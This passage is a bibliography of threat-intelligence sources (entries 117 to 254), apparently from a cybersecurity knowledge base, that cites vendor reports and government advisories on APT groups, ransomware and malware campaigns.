  117. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022. 

  118. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. 

  119. Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019. 

  120. Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021. 

  121. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  122. Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020. 

  123. Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021. 

  124. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019. 

  125. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018. 

  126. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018. 

  127. Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021. 

  128. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019. 

  129. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023. 

  130. Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021. 

  131. Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022. 

  132. Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. 

  133. Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018. 

  134. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. 

  135. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020. 

  136. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. 

  137. Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021. 

  138. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. 

  139. Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016. 

  140. Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018. 

  141. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018. 

  142. Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. 

  143. Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019. 

  144. Kaspersky Lab’s Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018. 

  145. Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022. 

  146. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. 

  147. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020. 

  148. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018. 

  149. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018. 

  150. Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018. 

  151. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020. 

  152. Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. 

  153. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019. 

  154. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. 

  155. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019. 

  156. CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. 

  157. DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023. 

  158. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022. 

  159. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. 

  160. Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. 

  161. Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021. 

  162. Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. 

  163. Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. 

  164. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017. 

  165. Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020. 

  166. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018. 

  167. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019. 

  168. Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020. 

  169. DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020. 

  170. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. 

  171. Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020. 

  172. FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017. 

  173. Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021. 

  174. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. 

  175. Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014. 

  176. Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022. 

  177. Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020. 

  178. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021. 

  179. Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019. 

  180. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  181. CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. 

  182. KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022. 

  183. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022. 

  184. SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19  

  185. Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017. 

  186. The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022. 

  187. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. 

  188. Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016. 

  189. ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022. 

  190. Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022. 

  191. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. 

  192. Kaspersky Lab’s Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016. 

  193. GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020. 

  194. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. 

  195. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. 

  196. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022. 

  197. DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks. Retrieved September 29, 2021. 

  198. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018. 

  199. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. 

  200. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. 

  201. Accenture iDefense Unit. (2019, March 5). Mudcarp’s Focus on Submarine Technologies. Retrieved August 24, 2021. 

  202. Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020. 

  203. Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. 

  204. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019. 

  205. Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018. 

  206. Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. 

  207. Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017. 

  208. Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018. 

  209. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019. 

  210. Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. 

  211. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. 

  212. Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. 

  213. Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016. 

  214. Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018. 

  215. Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020. 

  216. Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020. 

  217. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. 

  218. Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020. 

  219. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. 

  220. Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021. 

  221. Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021. 

  222. Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017. 

  223. Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021. 

  224. Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020. 

  225. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. 

  226. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. 

  227. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019. 

  228. FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. 

  229. Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. 

  230. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019. 

  231. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018. 

  232. Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019. 

  233. Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018. 

  234. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. 

  235. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. 

  236. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018. 

  237. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. 

  238. Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. 

  239. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. 

  240. Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021. 

  241. Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. 

  242. Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020. 

  243. Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. 

  244. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. 

  245. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. 

  246. Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. 

  247. Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. 

  248. CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. 

  249. MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021. 

  250. Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020. 

  251. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021. 

  252. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. 

  253. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023. 

  254. Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.